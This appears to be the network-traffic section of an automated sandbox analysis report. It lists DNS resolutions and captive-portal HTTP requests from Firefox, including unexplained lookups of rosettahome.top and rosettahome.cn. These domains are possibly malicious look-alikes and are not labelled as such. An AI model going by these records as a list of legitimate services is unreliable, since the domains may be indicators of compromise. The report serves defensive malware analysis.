                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com172.217.16.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867101908 CET1.1.1.1192.168.2.160x9dadNo error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867357016 CET1.1.1.1192.168.2.160x6dbfNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.867357016 CET1.1.1.1192.168.2.160x6dbfNo error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.870502949 CET1.1.1.1192.168.2.160xa45dNo error (0)www.wikipedia.orgdyna.wikimedia.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.870502949 CET1.1.1.1192.168.2.160xa45dNo error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.74.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.874563932 CET1.1.1.1192.168.2.160x2cb6No error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.875329018 CET1.1.1.1192.168.2.160x4f2eNo error (0)star-mini.c10r.facebook.com157.240.252.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.879350901 CET1.1.1.1192.168.2.160xe1caNo error (0)dyna.wikimedia.org185.15.59.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882241011 CET1.1.1.1192.168.2.160x428fNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882241011 CET1.1.1.1192.168.2.160x428fNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882241011 CET1.1.1.1192.168.2.160x428fNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882241011 CET1.1.1.1192.168.2.160x428fNo error (0)youtube-ui.l.google.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.882644892 CET1.1.1.1192.168.2.160xd4acNo error (0)star-mini.c10r.facebook.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.883964062 CET1.1.1.1192.168.2.160xcb86No error (0)spocs.getpocket.comprod.ads.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.883964062 CET1.1.1.1192.168.2.160xcb86No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.886966944 CET1.1.1.1192.168.2.160x5a2cNo error (0)dyna.wikimedia.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889763117 CET1.1.1.1192.168.2.160xf7bfNo error (0)www.reddit.comdualstack.reddit.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889763117 CET1.1.1.1192.168.2.160xf7bfNo error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889763117 CET1.1.1.1192.168.2.160xf7bfNo error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889763117 CET1.1.1.1192.168.2.160xf7bfNo error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889763117 CET1.1.1.1192.168.2.160xf7bfNo error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.889830112 CET1.1.1.1192.168.2.160xd56aNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.897258997 CET1.1.1.1192.168.2.160x199dNo error (0)twitter.com104.244.42.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.897258997 CET1.1.1.1192.168.2.160x199dNo error (0)twitter.com104.244.42.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.897258997 CET1.1.1.1192.168.2.160x199dNo error (0)twitter.com104.244.42.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.897258997 CET1.1.1.1192.168.2.160x199dNo error (0)twitter.com104.244.42.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898116112 CET1.1.1.1192.168.2.160x81eNo error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898730993 CET1.1.1.1192.168.2.160x1531No error (0)dualstack.reddit.map.fastly.net151.101.129.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898730993 CET1.1.1.1192.168.2.160x1531No error (0)dualstack.reddit.map.fastly.net151.101.65.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898730993 CET1.1.1.1192.168.2.160x1531No error (0)dualstack.reddit.map.fastly.net151.101.1.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.898730993 CET1.1.1.1192.168.2.160x1531No error (0)dualstack.reddit.map.fastly.net151.101.193.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.902679920 CET1.1.1.1192.168.2.160x76baNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.902679920 CET1.1.1.1192.168.2.160x76baNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906932116 CET1.1.1.1192.168.2.160x7eNo error (0)dualstack.reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906932116 CET1.1.1.1192.168.2.160x7eNo error (0)dualstack.reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906932116 CET1.1.1.1192.168.2.160x7eNo error (0)dualstack.reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.906932116 CET1.1.1.1192.168.2.160x7eNo error (0)dualstack.reddit.map.fastly.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.913726091 CET1.1.1.1192.168.2.160x3f87No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.914691925 CET1.1.1.1192.168.2.160xbb5eNo error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.967089891 CET1.1.1.1192.168.2.160x6f5No error (0)content-signature-2.cdn.mozilla.netcontent-signature-chains.prod.autograph.services.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.967089891 CET1.1.1.1192.168.2.160x6f5No error (0)content-signature-chains.prod.autograph.services.mozaws.netprod.content-signature-chains.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.967089891 CET1.1.1.1192.168.2.160x6f5No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.978099108 CET1.1.1.1192.168.2.160xe034No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net34.160.144.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.985769987 CET1.1.1.1192.168.2.160xa7e7No error (0)prod.content-signature-chains.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.469376087 CET1.1.1.1192.168.2.160x7339No error (0)firefox.settings.services.mozilla.comprod.remote-settings.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.469376087 CET1.1.1.1192.168.2.160x7339No error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.477456093 CET1.1.1.1192.168.2.160x2c48No error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.473186016 CET1.1.1.1192.168.2.160x5639No error (0)shavar.services.mozilla.comshavar.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.500164032 CET1.1.1.1192.168.2.160xcd10No error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.507937908 CET1.1.1.1192.168.2.160x13e9No error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.601587057 CET1.1.1.1192.168.2.160x5a5dNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.601587057 CET1.1.1.1192.168.2.160x5a5dNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.604535103 CET1.1.1.1192.168.2.160xc7bNo error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:17.613336086 CET1.1.1.1192.168.2.160x1a3cNo error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:18.125051975 CET1.1.1.1192.168.2.160x4303No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284008026 CET1.1.1.1192.168.2.160x3f10No error (0)firefox.settings.services.mozilla.comprod.remote-settings.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284008026 CET1.1.1.1192.168.2.160x3f10No error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:29.284116030 CET1.1.1.1192.168.2.160xc83fNo error (0)prod.remote-settings.prod.webservices.mozgcp.net34.149.100.209A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:35.062728882 CET1.1.1.1192.168.2.160x8e15No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.538676977 CET1.1.1.1192.168.2.160xed7No error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.852045059 CET1.1.1.1192.168.2.160x843cNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:42.852045059 CET1.1.1.1192.168.2.160x843cNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.851012945 CET1.1.1.1192.168.2.160x8bb1No error (0)services.addons.mozilla.org151.101.129.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.851012945 CET1.1.1.1192.168.2.160x8bb1No error (0)services.addons.mozilla.org151.101.1.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.851012945 CET1.1.1.1192.168.2.160x8bb1No error (0)services.addons.mozilla.org151.101.65.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.851012945 CET1.1.1.1192.168.2.160x8bb1No error (0)services.addons.mozilla.org151.101.193.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.864490032 CET1.1.1.1192.168.2.160x7231No error (0)services.addons.mozilla.org151.101.65.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.864490032 CET1.1.1.1192.168.2.160x7231No error (0)services.addons.mozilla.org151.101.129.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.864490032 CET1.1.1.1192.168.2.160x7231No error (0)services.addons.mozilla.org151.101.193.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.864490032 CET1.1.1.1192.168.2.160x7231No error (0)services.addons.mozilla.org151.101.1.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.873226881 CET1.1.1.1192.168.2.160xb549No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.873226881 CET1.1.1.1192.168.2.160xb549No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.873226881 CET1.1.1.1192.168.2.160xb549No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:43.873226881 CET1.1.1.1192.168.2.160xb549No error (0)services.addons.mozilla.org28IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.498796940 CET1.1.1.1192.168.2.160x1df8No error (0)normandy.cdn.mozilla.netnormandy-cdn.services.mozilla.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.498796940 CET1.1.1.1192.168.2.160x1df8No error (0)normandy-cdn.services.mozilla.com35.201.103.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:44.507292032 CET1.1.1.1192.168.2.160x48a8No error (0)normandy-cdn.services.mozilla.com35.201.103.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:48.539844990 CET1.1.1.1192.168.2.160x28fNo error (0)a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.coma17.rackcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:48.539844990 CET1.1.1.1192.168.2.160x28fNo error (0)a17.rackcdn.coma17.rackcdn.com.mdc.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.507944107 CET1.1.1.1192.168.2.160xf7b4No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:05.507944107 CET1.1.1.1192.168.2.160xf7b4No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:12.114520073 CET1.1.1.1192.168.2.160x75a4No error (0)telemetry-incoming.r53-2.services.mozilla.com34.120.208.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.491008043 CET1.1.1.1192.168.2.160x77c7No error (0)rosettahome.top104.238.61.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:33.620379925 CET1.1.1.1192.168.2.160x307fNo error (0)boinc.berkeley.edu208.68.240.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:43.235383034 CET1.1.1.1192.168.2.160xff60No error (0)rosettahome.cn104.238.61.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:45.510011911 CET1.1.1.1192.168.2.160xca28No error (0)push.services.mozilla.com34.107.243.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.000061035 CET1.1.1.1192.168.2.160x1919No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:46:46.000061035 CET1.1.1.1192.168.2.160x1919No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:30.433445930 CET1.1.1.1192.168.2.160x61fbNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:47:30.433445930 CET1.1.1.1192.168.2.160x61fbNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                                                                                      • www.google.com
                                                                                                                                                                                                                                                                                                                                                      • detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      • rosettahome.top
                                                                                                                                                                                                                                                                                                                                                      • rosettahome.cn

                                                                                                                                                                                                                                                                                                                                                      HTTP Packets

                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      0192.168.2.164972634.107.221.8280876C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:13.623064995 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:14.089421988 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80079
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      1192.168.2.164973134.107.221.8280876C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:15.871649027 CET305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.319284916 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 01:54:50 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 64226
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                                                                                                                                                                                                                                                                                      Data Raw: 73 75 63 63 65 73 73 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: success


                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                      2192.168.2.164973834.107.221.8280876C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.458626986 CET303OUTGET /canonical.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: detectportal.firefox.com
                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                      Jan 14, 2025 20:45:16.911051989 CET298INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 90
                                                                                                                                                                                                                                                                                                                                                      Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 13 Jan 2025 21:30:35 GMT
                                                                                                                                                                                                                                                                                                                                                      Age: 80081
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
